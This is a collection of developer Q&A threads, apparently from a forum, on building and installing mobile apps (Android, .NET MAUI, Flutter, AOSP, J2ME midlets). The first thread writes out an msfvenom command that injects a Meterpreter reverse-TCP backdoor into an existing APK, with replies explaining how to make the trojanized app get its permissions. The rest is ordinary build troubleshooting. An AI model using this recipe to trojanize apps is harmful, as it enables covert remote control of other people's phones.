payload injected app doesn't ask for any permissions - android-permissions

I'm trying to trying to inject an apk with msfvenom payload, and thus get a backdoor on my android device upon installing it. Why isn't it asking for permissions upon installation?
In the past I've been able to successfully create a standalone payload and get a backdoor tunnel to my device.
msfvenom -p android/meterpreter/reverse_tcp -x /Users/root/Downloads/newApp.apk LHOST=[IP] LPORT=[port] -o /Users/root/Desktop/android.apk
I expected the app to ask for all the permissions specified in manifest file, but it isn't asking for any during installation or at runtime.

I had the same problem, but I have found a fix for it.
create apk file injected with payload.
install it on your phone.
install APK Editor pro v1.9.7.
open the apk editor and search for the injected apk click on it and click on COMMON EDIT.
change Minimum SDK version to 10 and Target SDK Version to 17.
I have already checked it and it's working

You need to specify what permissions the Main.apk has in your device..did you check those?If it has not asked for permission chances are it has no permission.

I have found some problems in the payload generation, but I have also found a solution.
1.- Inject the payload in the original application.
2.- Install the apk file on an android device.
3.- Go to application settings and search for the infected application.
4.- Grant all permissions.
And that's it, this worked for me.


.NET MAUI iOS Publish throwing Missing Runtime Identifier error

I'm trying to publish my .NET MAUI app using a Mac and I'm getting the following error:
A runtime identifier must be specified in order to publish this
First, I'm not an experienced Mac user. Second, I'm on a remote rental Mac and I don't have Admin or Sudo privileges.
With that said, I tried to use the command from Microsoft docs but wasn't making any progress due to a few issues with the IP address of the Mac I'm renting, etc.
I then found a similar issue which suggested that I use:
dotnet publish -f:net6.0-ios -c:Release
Using this produced the error above. Someone suggested I add the runtime identifier to the command so I tried:
dotnet publish -f:net6.0-ios -c:Release -r ios-arm64
This gives me an error that indicates that ios-arm64 is not a valid identifier.
I then tried adding the following to the project file which is still not working and throwing the same error:
<PropertyGroup Condition="'$(IsPublishing)' == 'true' And '$(TargetFramework)' == 'net6.0-ios'">
Any suggestions how I can publish this app? I'm just trying to create the bundle. I'll then upload it manually.
If your provisioning profile is correct, and you are using VS 2022, try to export the certificate (p12 file) in Keychain of your Mac and import the certificate and profile into VS.
Go to Keychain, click Login, click Certificates on the top bar, then select the certificate, right click it and export as a p12 file, pay attention to remembering the password.
Move the file to your Windows machine, go to Tools -> Options->Xamarin ->Apple Account in VS, and click View Details, click Import Certificate, import the p12 file and input the password.
Unfortunately, you need sudo in order to publish your MAUI app. I had this issue before and I solved it using sudo command.
I think this issue can be fixed in future VS2022 release or when MAUI officially release in coming November 2022.

Flutter app not working in apk-release but works in debug mode (even after giving internet permissions)

My app works fine in debug mode. I followed all the steps mentioned in flutter docs for making apk-release. I even mentioned the internet permissions for the apk-release in AndroidManifest file. My apk-release builds perfectly fine. But when i install it in my phone and try to use the app(Basically login using phone number cause the first page in my app is the login page), it doesnt respond. I figured there must be some problem with the internet permissions but I rechecked everything. It all works fine when i install the debug apk from Android Studio, but the release apk is somehow unable to communicate with the authentication servers. Please help me.
Btw, I updated all the dependencies in pubspec.yaml like cloudfirestore versions and stuff. Still no change. Also, I guess my SHA1 key is right in firestore. I also had to rename my package name from com.example.pareez to com.rishav.pareez but I am sure I made no mistake in that.
UPDATE - I uninstalled the previously installed apk from my phone and I used flutter install from my pc and then the app ran perfectly well. I guess installing manually is giving me problems. But i installed other apps manually too, and they worked fine.
Build your aab bundle or apk using the below commands.
For aab bundle:
flutter build appbundle --no-shrink
For apk:
flutter build apk --no-shrink
This solution worked for me. I hope, this will also help you. Thanks for asking this question.

Error while uploading Flutter App to App Store: Non-public API usage

I am new in Flutter Development and i have developed an app with Webview.
I have upload an apk on Google Play Store that is accepted but for App Store it shows some error.
Please find below error,
ITMS-90338: Non-public API usage - The app references non-public
symbols in Frameworks/Flutter.framework/Flutter: _ptrace. If method
names in your source code match the private Apple APIs listed above,
altering your method names will help prevent this app from being
flagged in future submissions. In addition, note that one or more of
the above APIs may be located in a static library that was included
with your app. If so, they must be removed.
For this error i have search many things but i am unable found any solution for this.
So please any one who is capable of solving this please help me to resolve this.
Thanks & Regards,
This happens if you are submitting the debug version to the AppStore, Flutter team recommends you to first run
flutter build ios --release
before archiving your app in Xcode.
First make sure you are submitting a release build with flutter build ios --release
If that's not the problem here you could find similar problems related:
flutter build ios --release may use a debug Flutter.framework by mistake
In my case, I updated my Mac to 10.15(Catalina), while the update my cocoapods installation wasn't there. So whenever I try to upload using the command flutter build ios --release and archiving it. Apple sent me the same email you received.
You can install cocoapods using the following commands.
step 1 Open terminal
step 2 command: sudo gem install cocoapods
step 3 set your project path on the terminal.
step 4 command: pod init
I hope it helps.

How to install custom build AOSP apps in Android phone

I have build MMS app from AOSP (Build no: LMY48M) using the following command
make -j8 Mms
The command produces a Mms.apk file, that I would like to install in my Nexus 5 phone. The phone is rooted and has Android Build number LMY48M installed.
The phone should contain a Mms app installed with the same app Id of my Mms.apk file. I wanted to remove the installed Mms app from the phone as I have root permission. I do not find any Mms application whatsoever. SMS functionality is being provided by Hangouts app.
Moreover, when I tried to install the generated Mms.apk file, it shows permission screen with the install button. Tapping on install button starts the installation process but stops in few seconds with error "App not installed."
Any suggestion is appreciated. Thank you.
You should try copy paste the apk into system->app instead of installing
You should install the apk using the adb install command:
adb install -r Mms.apk
This should install the latest apk and will perform an update of the previous version of the Mms.apk if it is already present.
The tricky part here is if it is already present the new apk must be signed with the same cert as the existing one. I'm not sure if those are public certs or not but it's worth a try.
lunch aosp_arm-eng command is for emulator and won't work for device build, rather use specific command for the device. For Nexus 5 you need to use command lunch aosp_hammerhead-userdebug (Ref:
P.S you should download the same branch as of your device build number. For instance, my Nexus 5 device has build number LMY48M, so I should download branch android-5.1.1_r14. For more information,
Now you can install the Mms.apk file just tapping on it from device. You do not need to uninstall/remove Hangouts.
The Mms application has been replaced in Lillipop by Hangouts app. If you would like to install the Mms app as an internal app then you need to make the following folder structure in your rooted device,
and restart the device.

OTA midlet issue

After installing my midlet to a phone over the air, I'm getting a blank page from browser which need to be closed manually.
Any idea how to prevent it?
I read that JAD files are no longer required, as the all info located in JAR. I tried to use the JAR files instead of JAD's, but with them the browser first downloads and only then offers to install the middlet. With JAD it offers to install first, which IMHO more user friendly. Is this the expected behavior, or it can be improved and remove the need in JAD's?
I'm using Eclipse MJT (Previously called EclipseME).
A JAD file makes it easier to sign and deploy your application.
I would definitely not expect all phones to be able to install an applicaiton from the JAR alone.
Without more information, I can see 2 reasons why a blank web browser page would be left on the screen after a jad install:
bug in handset firmware. Not only can the phone not download the jar without launching a full web browser but it also forgets to close the browser window. It happens.
your application asks the phone to notify a remote computer after installation. There is a standard application property for this in the MIDP specifications. it could be in the jad or in the manifest.